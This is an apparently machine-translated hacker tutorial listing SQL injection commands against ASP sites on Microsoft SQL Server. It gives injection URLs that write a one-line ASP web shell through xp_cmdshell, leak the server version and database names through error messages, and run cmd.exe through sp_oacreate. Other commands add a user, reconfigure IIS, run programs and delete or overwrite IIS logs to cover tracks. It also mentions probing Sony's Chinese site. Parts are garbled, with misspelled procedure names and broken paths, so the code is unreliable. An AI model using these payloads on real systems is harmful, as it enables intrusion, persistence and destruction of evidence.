Some useful ASP injection-related commands

Hello everyone, we are pt007 and solaris7, QQ: 7491805/564935. Welcome to come and talk with experts :).

1. http: // 192.168.1.5/display. asp? Keyno = 1881; exec master. dbo. xp_cmdshell echo ^ <script language = VBScript runat = server ^> execute request ^ ("l" ^) ^ </script ^> c: mu. asp ;--
Use ^ escape characters to write ASP files.

2. http: // 192.168.1.5/display. asp? Keyno = 188 and 1 = (select @ VERSION)
Display the SQL System Version:
Microsoft VBScript compiler error 800a03f6
End missing
/IisHelp/common/500-100.asp, row 242
Microsoft ole db Provider for ODBC Drivers error 80040e07
[Microsoft] [odbc SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value Microsoft SQL Server 2000-8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) to a column of data type int.
/Display. asp, Row 17
3. When detecting Sony's Chinese website vulnerabilities, I have clearly determined the existence of the vulnerabilities, but cannot find the corresponding types among the three vulnerabilities. By accident, I thought that the keyword "in" can be used in SQL, for example, "select * from mytable where id in (1 )", the value in the brackets is the data we submit. The result is exactly the same as the query result using "select * from mytable where id = 1. So when you access the page, add ") and 1 = 1 and 1 in (1" after the URL, the original SQL statement becomes "select * from mytable where id in (1) and 1 = 1 and 1 in (1) ", so that the long-awaited page will appear. For the moment, this type of vulnerability is called "include number type". If you are smart, you must think of "include number type. By the way, it is caused by a query statement similar to "select * from mytable where name in ('firstsee.

4. http: // 192.168.1.5/display. asp? Keyno = 188 and 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE xtype = x and name = xp_mongoshell)
Determine whether the xp_mongoshell extended stored procedure exists.

5. http: // 192.168.1.5/display. asp? Users % 20/c % 20net user test ptlove/add
Write command lines and execution programs to the Startup Group

6. db_name "> http: // 192.168.1.5/display. asp? Keyno = 188% 20and % 200 <> db_name ()
Check the current database name. Microsoft VBScript compiler error: 800a03f6
End missing
/IisHelp/common/500-100.asp, row 242
Microsoft ole db Provider for ODBC Drivers error 80040e07
[Microsoft] [odbc SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value huidahouse to a column of data type int.
/Display. asp, Row 17
7. list all current database names: select * from master. dbo. sysdatabases

8. xp_cmdshell is not required to support running the CMD command on SQL servers with injection vulnerabilities:
Create table mytmp (info VARCHAR (400), ID int IDENTITY () not null)
DECLARE @ shell INT
DECLARE @ fso INT
DECLARE @ file INT
DECLARE @ isEnd BIT
DECLARE @ out VARCHAR (400)
EXEC sp_oacreate wscript. shell, @ shell output
EXEC sp_oamethod @shell,run,null,cmd.exe/c dir c:> c: emp.txt, 0, true
-- Note that the run parameter true indicates the result of waiting for the program to run. This parameter must be used for long-time commands similar to ping.

EXEC sp_oacreate scripting. filesystemobject, @ fso output
EXEC sp_oamethod @ fso, opentextfile, @ file out, c: emp.txt
-- Because the fso opentextfile method returns a textstream object, @ file is an object token.

WHILE @ shell> 0
BEGIN
EXEC sp_oamethod @ file, Readline, @ out
Insert into mytmp (info) VALUES (@ out)
EXEC sp_oagetproperty @ file, AtEndOfStream, @ isEnd out
IF @ isEnd = 1 BREAK
ELSE CONTINUE
END

DROP TABLE MYTMP

----------
DECLARE @ shell INT
DECLARE @ fso INT
DECLARE @ file INT
DECLARE @ isEnd BIT
DECLARE @ out VARCHAR (400)
EXEC sp_oacreate wscript. shell, @ shell output
EXEC sp_oamethod @shell,run,null,cmd.exe/c cscript C: InetpubAdminScriptsadsutil. vbs set/W3SVC/InProcessIsapiApps "C: WINNTsystem32idq. dll "" C: WINNTsystem32inetsrvhttpext. dll "" C: WINNTsystem32inetsrvhttpodbc. dll "" C: WINNTsystem32inetsrvssinc. dll "" C: WINNTsystem32msw3prt. dll "" C: winntsystem32inetsrvasp. dll "> c: emp.txt, 0, true
EXEC sp_oacreate scripting. filesystemobject, @ fso output
EXEC sp_oamethod @ fso, opentextfile, @ file out, c: emp.txt
WHILE @ shell> 0
BEGIN
EXEC sp_oamethod @ file, Readline, @ out
Insert into mytmp (info) VALUES (@ out)
EXEC sp_oagetproperty @ file, AtEndOfStream, @ isEnd out
IF @ isEnd = 1 BREAK
ELSE CONTINUE
END

Add WEB users to the Administrator group in one row:
DECLARE @ shell int declare @ fso int declare @ file int declare @ isEnd bit declare @ out VARCHAR (400) EXEC sp_oacreate wscript. shell, @ shell output EXEC sp_oamethod @shell,run,null,cmd.exe/c cscript C: InetpubAdminScriptsadsutil. vbs set/W3SVC/InProcessIsapiApps "C: WINNTsystem32idq. dll "" C: WINNTsystem32inetsrvhttpext. dll "" C: WINNTsystem32inetsrvhttpodbc. dll "" C: WINNTsystem32inetsrvssinc. dll "" C: WINNTsystem32msw3prt. dll "" C: winntsystem32inetsrvasp. dll "> c: emp.txt, 0, true EXEC sp_oacreate scripting. filesystemobject, @ fso output EXEC sp_oamethod @ fso, opentextfile, @ file out, c: emp.txt WHILE @ shell> 0 begin exec sp_oamethod @ file, Readline, @ out insert into mytmp (info) VALUES (@ out) EXEC sp_oagetproperty @ file, AtEndOfStream, @ isEnd out IF @ isEnd = 1 BREAK ELSE CONTINUE END

Execute the EXE program in one line:
DECLARE @ shell int declare @ fso int declare @ file int declare @ isEnd bit declare @ out VARCHAR (400) EXEC sp_oacreate wscript. shell, @ shell output EXEC sp_oamethod @shell,run,null,cmd.exe/c cscript.exe E: jeea.net. cnscoreftsimagesiis. vbs lh1 c:> c: emp.txt, 0, true EXEC sp_oacreate scripting. filesystemobject, @ fso output EXEC sp_oamethod @ fso, opentextfile, @ file out, c: emp.txt WHILE @ shell> 0 begin exec sp_oamethod @ file, Readline, @ out insert into mytmp (info) VALUES (@ out) EXEC sp_oagetproperty @ file, AtEndOfStream, @ isEnd out IF @ isEnd = 1 BREAK ELSE CONTINUE END

The following two methods can be used to execute the CMD command in SQL:

Delete log 7.18 first:
(1) exec master. dbo. xp_shareshell del C: winntsystem32logfilesW3SVC5ex050718. log> c: emp.txt
(2) DECLARE @ shell int declare @ fso int declare @ file int declare @ isEnd bit declare @ out VARCHAR (400) EXEC sp_oacreate wscript. shell, @ shell output EXEC sp_oamethod @shell,run,null,cmd.exe/c del C: winntsystem32logfilesW3SVC5ex050718. log> c: emp.txt, 0, true EXEC sp_oacreate scripting. filesystemobject, @ fso output EXEC sp_oamethod @ fso, opentextfile, @ file out, c: emp.txt WHILE @ shell> 0 begin exec sp_oamethod @ file, Readline, @ out insert into mytmp (info) VALUES (@ out) EXEC sp_oagetproperty @ file, AtEndOfStream, @ isEnd out IF @ isEnd = 1 BREAK ELSE CONTINUE END

Another example is to replace the 7.18 file:
(1) exec master. dbo. xp_shareshell copy C: winntsystem32logfilesW3SVC5ex050716. log C: winntsystem32logfilesW3SVC5ex050718. log> c: emp.txt
(2) DECLARE @ shell int declare @ fso int declare @ file int declare @ isEnd bit declare @ out VARCHAR (400) EXEC sp_oacreate wscript. shell, @ shell output EXEC sp_oamethod @shell,run,null,cmd.exe/c copy C: winntsystem32logfilesW3SVC5ex050716. log C: winntsystem32logfilesW3SVC5ex050718. log> c: emp.txt, 0, true EXEC sp_oacreate scripting. filesystemobject, @ fso output EXEC sp_oamethod @ fso, opentextfile, @ file out, c: emp.txt WHILE @ shell> 0 begin exec sp_oamethod @ file, Readline, @ out insert into mytmp (info) VALUES (@ out) EXEC sp_oagetproperty @ file, AtEndOfStream ,@